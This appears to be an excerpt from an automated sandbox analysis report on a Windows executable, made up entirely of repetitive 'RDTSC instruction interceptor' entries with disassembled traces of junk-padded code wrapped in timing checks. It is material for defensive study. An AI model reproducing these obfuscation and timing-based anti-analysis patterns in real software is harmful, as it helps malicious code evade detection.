                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00351 second address: 5F00380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3C07168Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 popad 0x00000011 push 00000003h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F87BC5165C8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00380 second address: 5F00384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00384 second address: 5F0038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F003BA second address: 5EF0A30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F87BD02CC8Ch 0x00000011 and al, FFFFFF98h 0x00000014 jmp 00007F87BD02CC8Bh 0x00000019 popfd 0x0000001a mov ah, 80h 0x0000001c popad 0x0000001d leave 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F87BD02CC91h 0x00000025 adc al, 00000036h 0x00000028 jmp 00007F87BD02CC91h 0x0000002d popfd 0x0000002e call 00007F87BD02CC90h 0x00000033 mov edi, esi 0x00000035 pop ecx 0x00000036 popad 0x00000037 retn 0008h 0x0000003a mov dword ptr [ebp-18h], eax 0x0000003d push 00007F00h 0x00000042 push 00000000h 0x00000044 call 00007F87BD02D815h 0x00000049 jmp 00007F87C2B1BAB2h 0x0000004e mov edi, edi 0x00000050 pushad 0x00000051 mov dh, ch 0x00000053 mov dh, 1Eh 0x00000055 popad 0x00000056 xchg eax, ebp 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b pop edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0A30 second address: 5EF0A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F87BC5165C2h 0x0000000f adc ch, 00000018h 0x00000012 jmp 00007F87BC5165BBh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F87BC5165C9h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F87BC5165BDh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0A8B second address: 5EF0B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E4F2h 0x00000007 mov ax, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 jmp 00007F87BD02CC8Bh 0x00000015 pushfd 0x00000016 jmp 00007F87BD02CC98h 0x0000001b xor cl, 00000038h 0x0000001e jmp 00007F87BD02CC8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 jmp 00007F87BD02CC96h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F87BD02CC8Ch 0x00000035 or si, 1CC8h 0x0000003a jmp 00007F87BD02CC8Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B0A second address: 5EF0B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B0F second address: 5EF0B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B1F second address: 5EF0B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F87BC5165C6h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B3B second address: 5EF0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 jmp 00007F87BD02CC93h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 9Dh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B60 second address: 5EF0B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B7A second address: 5EF0B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b mov cx, dx 0x0000000e pop ebx 0x0000000f mov cx, 78EBh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F87BD02CC8Dh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0B9E second address: 5EF0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BC5165C7h 0x00000009 jmp 00007F87BC5165C3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0BCF second address: 5EF0C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub edi, edi 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c mov edi, 3D8A7F52h 0x00000011 popad 0x00000012 test dword ptr [ebp+0Ch], FFFF0000h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, D611h 0x00000020 pushfd 0x00000021 jmp 00007F87BD02CC8Eh 0x00000026 sbb ch, 00000068h 0x00000029 jmp 00007F87BD02CC8Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0C0E second address: 5EF0C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0C14 second address: 5EF0C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F882CD62C8Ah 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 pushfd 0x00000013 jmp 00007F87BD02CC96h 0x00000018 add cx, 5AF8h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F87BD02CC90h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0C66 second address: 5EF0C75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0C75 second address: 5EF0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B87Ah 0x00000007 jmp 00007F87BD02CC8Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ecx, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov esi, 2F81321Bh 0x00000018 mov ch, D4h 0x0000001a popad 0x0000001b call 00007F87BD02CC89h 0x00000020 pushad 0x00000021 mov ebx, 4A13F6FCh 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d sbb al, 0000007Eh 0x00000030 jmp 00007F87BD02CC99h 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a call 00007F87BD02CC8Ah 0x0000003f pushfd 0x00000040 jmp 00007F87BD02CC92h 0x00000045 xor ax, 5BA8h 0x0000004a jmp 00007F87BD02CC8Bh 0x0000004f popfd 0x00000050 pop eax 0x00000051 pushfd 0x00000052 jmp 00007F87BD02CC99h 0x00000057 and ecx, 413567C6h 0x0000005d jmp 00007F87BD02CC91h 0x00000062 popfd 0x00000063 popad 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F87BD02CC93h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0D50 second address: 5EF0D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0D56 second address: 5EF0D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0D6D second address: 5EF0D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165BCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0D84 second address: 5EF0DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 pushfd 0x00000012 jmp 00007F87BD02CC90h 0x00000017 jmp 00007F87BD02CC95h 0x0000001c popfd 0x0000001d popad 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F87BD02CC99h 0x0000002a jmp 00007F87BD02CC8Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0DF0 second address: 5EF0E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F87BC5165BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F87BC5165C1h 0x00000017 sub esi, 42714966h 0x0000001d jmp 00007F87BC5165C1h 0x00000022 popfd 0x00000023 mov dh, cl 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 movsx edi, si 0x0000002b call 00007F87BC5165C2h 0x00000030 push esi 0x00000031 pop edi 0x00000032 pop eax 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 mov ah, E2h 0x00000038 mov dl, C3h 0x0000003a popad 0x0000003b mov dword ptr [esp], edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F87BC5165C3h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0E85 second address: 5EF0EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0EAB second address: 5EF0EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0F00 second address: 5EF0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0F06 second address: 5EF0F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EF0F17 second address: 5F008E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F87BD02CC8Eh 0x00000011 retn 0008h 0x00000014 mov dword ptr [ebp-14h], eax 0x00000017 mov dword ptr [ebp-04h], 00000000h 0x0000001e lea eax, dword ptr [ebp-30h] 0x00000021 push eax 0x00000022 call 00007F87BD02D81Ah 0x00000027 jmp 00007F87C2B2B943h 0x0000002c mov edi, edi 0x0000002e pushad 0x0000002f mov cx, 3899h 0x00000033 mov dx, ax 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d mov cx, bx 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F008E0 second address: 5F00909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F87BC5165BEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00909 second address: 5F0091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0091F second address: 5F00923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00923 second address: 5F0093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0093E second address: 5F0099A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F87BC5165BEh 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 jmp 00007F87BC5165C0h 0x00000018 cmp dword ptr [ecx], 30h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F87BC5165C7h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F0099A second address: 5F009E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F882CD46504h 0x0000000f pushad 0x00000010 jmp 00007F87BD02CC8Ch 0x00000015 pushad 0x00000016 movzx ecx, dx 0x00000019 jmp 00007F87BD02CC8Dh 0x0000001e popad 0x0000001f popad 0x00000020 push 00000001h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F009E5 second address: 5F009E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F009E9 second address: 5F009EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F009EF second address: 5F009F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F009F5 second address: 5F00A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F87BD02CC89h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BD02CC96h 0x00000014 sub al, 00000028h 0x00000017 jmp 00007F87BD02CC8Bh 0x0000001c popfd 0x0000001d call 00007F87BD02CC98h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00A47 second address: 5F00A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00A54 second address: 5F00A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00A67 second address: 5F00A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F87BC5165C0h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00A8A second address: 5F00AC0 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushfd 0x0000000a jmp 00007F87BD02CC95h 0x0000000f sub cx, B4B6h 0x00000014 jmp 00007F87BD02CC91h 0x00000019 popfd 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5F00AC0 second address: 5F00B0B instructions: 0x00000000 rdtsc 0x00000002 mov si, 5AA7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F87BC5165BDh 0x00000012 pop eax 0x00000013 jmp 00007F87BC5165BEh 0x00000018 push 00000000h 0x0000001a jmp 00007F87BC5165C0h 0x0000001f sub edx, edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F87BC5165BCh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0BEC second address: 5EE0BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0BF0 second address: 5EE0C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0C0D second address: 5EE0C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0C13 second address: 5EE0C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0C17 second address: 5EE0C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC95h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0C37 second address: 5EE0CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F87BC5165BEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F87BC5165C0h 0x00000016 sub eax, eax 0x00000018 jmp 00007F87BC5165C1h 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F87BC5165BEh 0x00000025 nop 0x00000026 pushad 0x00000027 mov edx, eax 0x00000029 mov ah, E1h 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F87BC5165C4h 0x00000032 nop 0x00000033 pushad 0x00000034 mov dx, 3F20h 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F87BC5165BBh 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0CC2 second address: 5EE0D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F87BD02CC97h 0x00000012 push 1D65F928h 0x00000017 jmp 00007F87BD02CC8Fh 0x0000001c xor dword ptr [esp], 5D65F929h 0x00000023 jmp 00007F87BD02CC96h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push edi 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D1F second address: 5EE0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D24 second address: 5EE0D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D33 second address: 5EE0D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165BBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D49 second address: 5EE0D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D4F second address: 5EE0D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D53 second address: 5EE0D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0D57 second address: 5EE0DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F87BC5165C7h 0x0000000e push dword ptr [ebp+34h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F87BC5165C4h 0x00000018 or ch, 00000048h 0x0000001b jmp 00007F87BC5165BBh 0x00000020 popfd 0x00000021 mov eax, 3FBED4BFh 0x00000026 popad 0x00000027 mov ecx, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F87BC5165C1h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0DBB second address: 5EE0DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0DC1 second address: 5EE0DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5EE0ED6 second address: 5EE0EE1 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0D02 second address: 5ED0D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F87BC5165C7h 0x00000008 pop ecx 0x00000009 mov bh, 8Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov di, 3634h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0D2A second address: 5ED0D4A instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F87BD02CC93h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0D4A second address: 5ED0D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0721 second address: 5ED0739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED0739 second address: 5ED0757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BC5165C3h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 5ED080B second address: 5ED0826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
